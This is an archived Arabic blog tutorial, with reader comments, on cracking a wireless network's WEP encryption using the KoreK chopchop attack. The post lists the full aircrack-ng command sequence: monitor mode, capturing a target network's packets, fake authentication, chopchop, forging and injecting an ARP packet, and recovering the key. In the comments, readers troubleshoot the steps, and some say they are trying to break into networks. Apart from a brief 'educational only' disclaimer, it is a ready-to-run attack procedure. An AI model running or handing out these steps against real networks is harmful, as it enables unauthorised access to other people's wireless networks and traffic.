أمن وحماية الشبكات-فيديوشروحات الفيديو

فيديو: WEP korek chopchop attack

تم أرشفة هذا المحتوى


تحدثنا سابقا عن فك تشفير WEP دون الحاجة الى لوجود أي جهاز (client) متصل بالشبكة الهدف باستخدام fake authentication attack أما اليوم فسنستخدم طريفة اخرى تدعى korek chopchop attack لكسر تشفير شبكة وايرلس تستخدم تشفير WEP في أقل من 10 دقائق.

ملاحظة: الشرح من توزيعة backtrack3 ويمكن تطبيقه من أي توزيعة لينكس اخرى بعد تثبيت حزمة aircrack-ng.

الفيديو للغرض التعليمي فقط و أنا غير مسؤول عن أي استخدام خاطئ للمعلومات المذكورة في الشرح

الفيديو:

 
http://www.youtube.com/watch?v=KecIVQLHfvw

الخطوات:

1. سنحتاج الى وضع كرت الوايرلس في الـ monitor mode بتنفيذ الأمر:

airmon-ng start [interface]

حيث: interface هو اسم كرت الوايرلس الخاص بك.

 

2. استخدام برنامج airodump-ng لمشاهدة الشبكات المتوفرة بتنفيذ الأمر:

airodump-ng [interface]

 

3. تشغيل برنامج airodump-ng لجمع الحزم من الشبكة الهدف

airodump-ng -c  [channel] –bssid [target BSSID] -w out [interface]

حيث:
channel القناة اللتي تعمل عليها الشبكة
bssid الماك ادرس الخاص بالشبكة
out اسم الملف الذي ستحفظ فيه الحزم

 

4. عمل fake authentication للـ AP الخاص بنا على الشبكة الهدف حتى نستطيع تنفيذ chopchop attack في الخطوة القادمة

توضيح: اذا قمنا بنفيذ chopchop attack مباشرة دون القيام بهذه الخطوة فان الشبكة الهدف ستقوم بارسال حزم deauthentication و بالتالي سيفشل الهجوم و لذلك سنقوم بعمل fake authentication (تصريح مزيف) لجهازنا لنتمكن من تنفيذ chopchop attack
ملاحظة: بعد تنفيذ هذه الخطوة سوف تشاهد ظهور كلمة OPN في حقل AUTH في نافذة برنامج airodump-ng.

aireplay-ng -1 0 -a [target bssid] -h [source MAC address] -e [target ESSID] [interface]

حيث:
target bssid ماك أدرس الخاص بالشبكة
source MAC address ماك أدرس الخاص بك و يمكننا معرفته من خلال تنفيذ الامر

ifconfig [interface]

حيث: target essid اسم الشبكة الهدف

 

5. استخدام برنامج aireplay-ng للبدء بالـ chopchop attack

aireplay-ng -4 -b [target BSSID] -h [source MAC address (your MAC)] [interface]

 

6. استخدام برنامج packetforge لتكوين حزمة arp التي سوف نحقنها في الشبكة الهدف

packetforge-ng -0 -a [target BSSID] -h [source MAC] -k  [destination IP in fragments] -l [source IP in fragments] -y arp.xor -w [output2]

 

7. حقن الحزمة المكونة في الخطوة 6 باستخدام برنامج aireplay-ng

aireplay-ng -2 -r [output2] [interface]

حيث: r- الحزمة المكونة في الخطوة السابقة

 

8. فك التشفير بالستخدام برنامج aircrack-ng

aircrack-ng [file]

حيث: file الملف الذي تم تخزين الحزم فية من الخطوة 3

ان شاء الله يكون الشرح واضح و اي استفسار اني حاضر

دمتم بود

Zaid S.Hussien

‫11 تعليقات

  1. كما عودتنا شرح رائع وجميل 🙂

    شكرا زيد وبانتظار المزيد من الشروحات والمواضيع عن الـ Wireless Hacking 😛

  2. Mustafa Albazy:شكرا على مرورك,طبعا فكرت باضافة صوت للفيديو لكنني ترددت ربما في المستقبل.
    عبد المهيمن:منور الموضوع و شكرا على التشجيع
    ICEMAN:الامر
    airmin-ng stop [interface]
    يستخدم لايقاف كارد تم وضعه في الـmonitor mod مسبفا
    اما بالنسبة لي فلم بكن الكارد الخاص بي في الـMonitor mod لذك قمت بوضعه في المونيتور مود

  3. السلام عليكم
    مشكور على الشرح الرائع بس البرنامج عندي يبقى يجمع حزم
    حيث يبقى يجمع حزم ولا تظهر لي رسالة
    do you want to use these packets ?
    يستمر بجمع الحزم فقط ولمدة طويلة
    حل يوجد حل ؟ او ما هي المشكلة بالضبط ؟

  4. اخي زيد رحمه الله والديك على الشرح
    عندي سؤال بالنسبة للخطوة

    packetforge-ng -0 -a [target BSSID] -h [source MAC] -k [destination IP in fragments] -l [source IP in fragments] -y arp.xor -w [output2]

    شنو هذا الرقم الي وضعته 255.255.255.255 destination IP in fragments
    والرقم الي بعده ايضا 255.255.255.255.255 source IP in fragments

    انا لدي فقط subnetmask وهو 255.255.255.0

    وشكرا لك وصيام مقبول ان شاء الله

  5. اخي الكريم سؤال ثاني انا طبقت على شبكتين الاولى ظهر لي في بداية الامر مشكلة في عدم نجاح عملية chopchop attack في الخطوة 5 ولكن عند تكراراها نحجت وظهر لي المفتاح
    على شكل 78:03:15:18:25 هل هذا هو الكي صحيح ؟

    والشبكة الثانية المشكلة في Essid اقواس مثلاً isecur1ty (h) 07756451
    عند تطبيق الخطوة رقم 4 عمل fake authentication
    يظهر لي خطأ وهو

    bash:syntax error near unexpexted token ‘(‘ what this problem –

    وان شاء الله ماسويت عليك زحمة
    موفق ان شاء الله

  6. a.j:جرب اعادة الخطوة 4 اثناء عملية جمع الحزم
    مهند:لا النت ماسك غير
    و نعم هذا هو المفتاح الصحيح
    اما بالنسبة لاسم الشبكة اذا احتوى على فراغات فيجب وضعه في علامات تنصيص “” و ليس داخل اقواس
    مثال:
    “network essid”

  7. يطلع خطا

    Command ‘aireplay-ng’ is available in ‘/usr/sbin/aireplay-ng’
    The command could not be located because ‘/usr/sbin’ is not included in the PATH environment variable.
    This is most likely caused by the lack of administrative priviledges associated with your user account.
    bash: aireplay-ng: command not found
    ؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

  8. السلام عليكم اخي العزيز انا اهنئك على هذا الموقع والله يوفقك بس انا عندي سؤال بسيط واتمنى ما تبخل علي باإجابة

    انا عندي وايرلس wusb54gc rt73 واسوي بحث ولكن هل احتاج الى تحديث الوايرلس
    مثل هذه الروابط مع العلم انا اريد فقط اختراق wep

    bt ~ # wget http://homepages.tu-darmstadt…..1.tar.bz2
    bt ~ # wget http://www.offensive-security.com/kernel.lzm

    واتمنى اخوي تجاوبني على السؤال واكون مشكور

  9. سلام عليك أخي أشكرك
    هل برنامج packetforge موجود في نسخة باك تراك 3؟
    إن كان لا من أين أحمله؟ وكيف أتبته ؟
    الله بارك فيك

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *

زر الذهاب إلى الأعلى